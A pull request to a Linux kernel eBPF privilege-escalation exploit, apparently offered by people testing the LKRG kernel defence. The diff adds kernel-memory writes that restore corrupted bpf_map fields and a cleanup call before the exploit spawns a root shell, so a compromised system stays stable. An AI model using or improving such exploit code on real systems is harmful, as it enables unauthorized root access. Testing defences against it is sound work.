### PR TITLE
Perform more complete and earlier cleanup

### DIFF
--- a/exploit.c
+++ b/exploit.c
@@ -451,28 +451,24 @@ void cleanup_read(exploit_context* pCtx)
 void cleanup_write(exploit_context* pCtx)
 {
     uint64_t null = 0;
+    int ret;
+
+    // restore bpf_map->max_entries = 1
+    ret = kernel_write_uint(pCtx, pCtx->oob_map_ptr - BPF_MAP_MAX_ENTRIES_OFFSET, 1);
+
+    // claim !map_value_has_spin_lock()
+    ret |= kernel_write_uint(pCtx, pCtx->oob_map_ptr - BPF_MAP_SPIN_LOCK_OFF_OFFSET, -1);
 
     // restore bpf_map->btf = NULL
-    if(0 != kernel_write(pCtx, pCtx->oob_map_ptr - BPF_MAP_BTF_OFFSET, (char*)&null, sizeof(uint64_t)))
-    {
-        printf("[-] warning, cleanup failed! this will cause instability...\n");
-        goto done;
-    }
+    ret |= kernel_write(pCtx, pCtx->oob_map_ptr - BPF_MAP_BTF_OFFSET, (char*)&null, sizeof(uint64_t));
 
     // restore bpf_map->map_type = BPF_MAP_TYPE_ARRAY
-    if(0 != kernel_write_uint(pCtx, pCtx->oob_map_ptr - BPF_MAP_TYPE_OFFSET, BPF_MAP_TYPE_ARRAY))
-    {
+    if(ret | kernel_write_uint(pCtx, pCtx->oob_map_ptr - BPF_MAP_TYPE_OFFSET, BPF_MAP_TYPE_ARRAY))
         printf("[-] warning, cleanup failed! this will cause instability...\n");
-        goto done;
-    }
 
-    // We can't restore the rest of the values without breaking the write primitive, and we can't run another BPF program
-    // because we overwrote spin_lock_off. However, this is enough to exit cleanly. 
+    // We don't restore the rest of the values. However, this is enough to exit cleanly.
 
     pCtx->state = EXPLOIT_STATE_CLEAN;
-
-done:
-    return;
 }
 
 void cleanup(exploit_context* pCtx)
@@ -568,6 +564,8 @@ int main(int argc, char **argv)
         printf("[-] LPE failed :(\n");
         goto done;
     }
+
+    cleanup(&ctx);
 
     printf("[+] success! enjoy r00t :)\n");
     system("sh");


### PR DESCRIPTION
Hi @chompie1337. @Adam-pi3 and I found your exploit useful for testing of LKRG. Thank you!

While it worked great for us in a VM at first, longer-term it turned out to cause system instability. If ran without LKRG loaded, then I'd get an Oops in `Workqueue: events bpf_prog_free_deferred` at later LKRG load time (would probably also be triggered by certain other extensive use of the system?); if ran with LKRG already loaded and protecting (task integrity checking and enforcement kept enabled, as it is by default), the same kind of Oops would happen right upon LKRG killing the exploit (which correctly happens instead of a root shell getting spawned). After the Oops, disk syncs would get stuck (e.g., the `sync` command), making the system partially unusable (e.g., systemd journal no longer updated, and the system wouldn't even shut down cleanly).

The changes here correct all of that for me (no Oops, nor any other system stability issues observed, with or without LKRG), as tested on 5.8.0-50-generic.

While at it, I'm also changing the cleanup logic such that if one of the cleanup writes fails, the rest are attempted anyway - for a best-effort cleanup, then. However, in my testing on the kernel mentioned above all 4 writes succeed.

If you still have your other test VMs for this, I guess it'd make sense for you to retest the exploit with these changes. We did not retest on the full kernel version ranges mentioned in `README.md`.